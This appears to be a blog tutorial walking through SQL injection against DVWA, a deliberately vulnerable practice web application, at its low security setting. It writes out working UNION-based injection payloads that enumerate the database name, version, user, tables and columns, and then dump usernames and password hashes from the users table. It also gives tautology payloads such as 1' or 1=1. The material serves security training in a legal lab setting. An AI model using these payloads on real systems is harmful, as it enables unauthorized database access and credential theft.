DVWA Low Security SQL Injection Hacking
DVWA Low Security SQL Injection Hacking

DVWA ( Damn Vulnerable Web Application ) lets you practise some of the web application security concepts legally, that is setup on you own machine and lets you decide the level of security which you will be breaking.

Those who are reading it most probably already know What is DVWA and how to host it on your own machine, where to start and other things, so without taking much time we will start with SQL Injection

How to Setup DVWA Pentest Lab https://www.ethicalhackx.com/how-to-host-dvwa-pentest-lab-on-wamp-server/
DVWA Brute Force : Low Securityhttps://www.ethicalhackx.com/dvwa-brute-force-low-security-burp-suite/

DVWA Low Security Setting
DVWA Low Security Setting

First let’s have a look at code which is causing the vulnerability, I mean the reason behind all the Injection possibilities, it will be better if you figure this out and compare the different versions -low, medium and high security. Find out whats the difference.
Click on view-source button at Right-Bottom on SQL-Injection Page in DVWA to open the source in new window.

DVWA Low Security SQL Injection Source Code
DVWA Low Security SQL Injection Source Code

Step by Step : SQL Injection

I have made a short video on same showing each steps below, check this out

Step 1: Input Field is Vulnerable ?


Yes it is but how to know that ? How to check ?
Throw some input to the field to see what output we get. Lets first go with 1

User Input in Field:
1
DVWA SQL Injection Vulnerable Form Field
DVWA SQL Injection Vulnerable Form Field

The Output we got says – ID, First Name, Last Name.

User Input in Field:
1'
1' in input throws this error page
1′ in input throws this error page

The field is vulnerable to SQL Injection, so lets start digging information.

Step 2 : How many Columns are there ?

We now find out how many columns are there , and we do this with order by.

User Input in Field:
1' order by 1-- -
1' order by 1 #
1' order by 2 #
1' order by 3 #
Finding number of columns
Finding number of columns
Finding number of columns
Finding number of columns

So we have Column 1,2 but when you try for Column 3, we face error that – Unknown column ‘3’ in ‘order clause’

Step 3 : Fetch the Data.

User Input in Field:
1' union select 1,2 #

Step 4: Getting more details like database name, version etc.

We can replace – “1′ union select 1,2 #” “1” and “2” with SQL Understandable inputs to get the desired output. We hence try few things.

Getting database name:

User Input in Field:
1' union select null,database() #
SQL Injection Hacking : Getting Database name
SQL Injection Hacking : Getting Database name

Getting The database Version :

User Input in Field:
1' union select null,version() #
SQL Injection Hacking : Getting Database Version
SQL Injection Hacking : Getting Database Version

Getting The user name :

User Input in Field:
1' union select null,user() #
SQL Injection Hacking : Getting User Name
SQL Injection Hacking : Getting User Name

Getting the Table Names

User Input in Field:
1' union select null,table_name from information_schema.tables #
SQL Injection Hacking : Getting Table Name
SQL Injection Hacking : Getting Table Name

We got a list of Tables present, any useful information here ? When you scroll the page you might find few very interesting entries like – admin, users, USER_PRIVILEGES. Basically depends on what you are looking for. I am happy in digging more about users table.
NOTE: I have increased input form field width to make it visible at few places, its not actual size what you see in screenshots here.

User Input in Field:
1' union select null,table_name from information_schema.tables where table_name like 'user%'#
SQL Injection Hacking : Getting Table Name which are similar to USERS
SQL Injection Hacking : Getting Table Name which are similar to USERS

We have listed tables which have User in name like users, users_groups, users_permissions

Now we get the column names from table- users

User Input in Field:
1' union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
SQL Injection Hacking : Getting Column Names for USERS Table
SQL Injection Hacking : Getting Column Names for USERS Table

This gives us column names in user table like – user_id, first_name, last_name, user, password, avatar

User Input in Field:
1' union select null, concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
SQL Injection Hacking : Getting Rows (Data) from Users Table
SQL Injection Hacking : Getting Rows (Data) from Users Table

So we finally got the User details like user_id, first and last name, password(hash) from the user database.

User Input in Field:
1' or 1=1 #
1' or '1'=1 #
1' or 1=1-- -
DVWA Low Security SQL Injection Hacking
DVWA Low Security SQL Injection Hacking

So this was all about DVWA SQL Injection at Low Security. We learnt how we can get details like user_name and passwords. The purpose was to show
How to check if input field is vulnerable ?
How to get table and column names ?
How to get columns (data) from required columns and tables ?

In upcoming articles we will do same with DVWA Medium and High Security, as well with other vulnerable Web Application Frameworks like bwapp and more.

What Do You Think on This ? Say Here